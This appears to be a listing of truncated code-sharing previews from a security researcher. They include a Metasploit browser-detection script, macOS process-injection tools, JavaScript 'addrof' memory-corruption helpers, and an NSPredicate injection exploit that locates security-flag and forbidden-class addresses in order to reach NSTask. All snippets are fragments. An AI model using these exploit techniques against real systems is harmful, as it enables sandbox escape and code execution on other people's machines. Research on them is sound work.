This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script> | |
// Case matters, see lib/msf/core/constants.rb | |
// All of these should match up with constants in ::Msf::HttpClients | |
var clients_opera = "Opera"; | |
var clients_ie = "MSIE"; | |
var clients_ff = "Firefox"; | |
var clients_chrome = "Chrome"; | |
var clients_safari = "Safari"; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// To compile: clang stop_at_entry.c -lbsm -lEndpointSecurity -o stop_at_entry, | |
// then codesign with com.apple.developer.endpoint-security.client and run the | |
// program as root. | |
#include <EndpointSecurity/EndpointSecurity.h> | |
#include <assert.h> | |
#include <bsm/libbsm.h> | |
#include <dispatch/dispatch.h> | |
#include <signal.h> | |
#include <stdbool.h> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
class Helpers { | |
constructor() { | |
this.addrof_LO = new Array(1048577); | |
this.buf = new ArrayBuffer(8); | |
this.f64 = new Float64Array(this.buf); | |
this.f32 = new Float32Array(this.buf); | |
this.u32 = new Uint32Array(this.buf); | |
this.u64 = new BigUint64Array(this.buf); | |
this.state = {}; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// To compile: clang++ -arch x86_64 -arch arm64 -std=c++20 library_injector.cpp -lbsm -lEndpointSecurity -o library_injector, | |
// then codesign with com.apple.developer.endpoint-security.client and run the | |
// program as root. | |
#include <EndpointSecurity/EndpointSecurity.h> | |
#include <algorithm> | |
#include <array> | |
#include <bsm/libbsm.h> | |
#include <cstddef> | |
#include <cstdint> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#import <Foundation/Foundation.h> | |
/* | |
[~/predicament]$ gcc -framework Foundation -lobjc -o predicament predicament.m | |
[~/predicament]$ ./predicament "function('','stringByAppendingFormat:','%lld ').longLongValue" | |
Expr: 'FUNCTION("", "stringByAppendingFormat:" , "%lld ").longLongValue' (type: 4) | |
Value: 105553129238592 | |
Danger: 105553129237664 (offset 928) | |
[~/predicament]$ ./predicament "function(function('','stringByAppendingFormat:','%lld ').longLongValue-928,'longValue').dangerous" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
NSPredicate *pred = [NSPredicate predicateWithFormat:@"1=cast({" // cast to get nice error in syslog for debugging | |
// use format string to read the address of _NSPredicateUtilities ( #self() ), theres prolly a better way | |
"$_NSPredicateUtilities := function('','stringByAppendingFormat:', '%p/%lld', #self()).lastPathComponent.longLongValue," | |
"$_predicateSecurityFlags := $_NSPredicateUtilities + 0x188c," // address of _predicateSecurityFlags | |
"$_predicateSecurityOnce := $_predicateSecurityFlags - 0x276daec," // address of _predicateSecurityOnce | |
"$forbiddenClassesLength := $_predicateSecurityFlags + 0x63a334," // address of length field for array of forbidden classes | |
"$forbiddenSelectorsLength := $_predicateSecurityFlags + 0x63a3d4," // address of length field for array of forbidden selectors | |
"$NSTask := $_NSPredicateUtilities + 0x637860," // address of NSTask class | |
"$NSPipe := $NSTask - 0x41a0," // address of NSPipe class |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// yields brainfuck when quined | |
char *h = "++++++++[>++++[>++>+++>+++>+<<<<-]>+>+>->>+[<]<-]" | |
">>.>---.+++++++..+++.>>.<-.<.+++.------.--------.>>+.>++."; // -> Hello World! | |
#import <Foundation/Foundation.h> | |
int main(int argc, char *argv[]) { | |
NSString *program = [NSString stringWithUTF8String: argc > 1 ? argv[1] : h]; | |
NSMutableArray *prog = [NSMutableArray array]; // make the program into an array cuz its easier | |
for (int i = 0; i < program.length; i++) { | |
NSString *c = [program substringWithRange: NSMakeRange(i, 1)]; | |
if ([@".,<>-+[]" rangeOfString: c].location != NSNotFound) [prog addObject: c]; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// dump classes and selectors forbidden in NSPredicates | |
// `cc -framework Foundation -o restricted restricted.m` | |
#import <Foundation/Foundation.h> | |
#import <dlfcn.h> | |
int main() { | |
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0); | |
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses"); | |
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors"); | |
NSLog(@"Restricted Selectors: %@", RestrictedSelectors()); |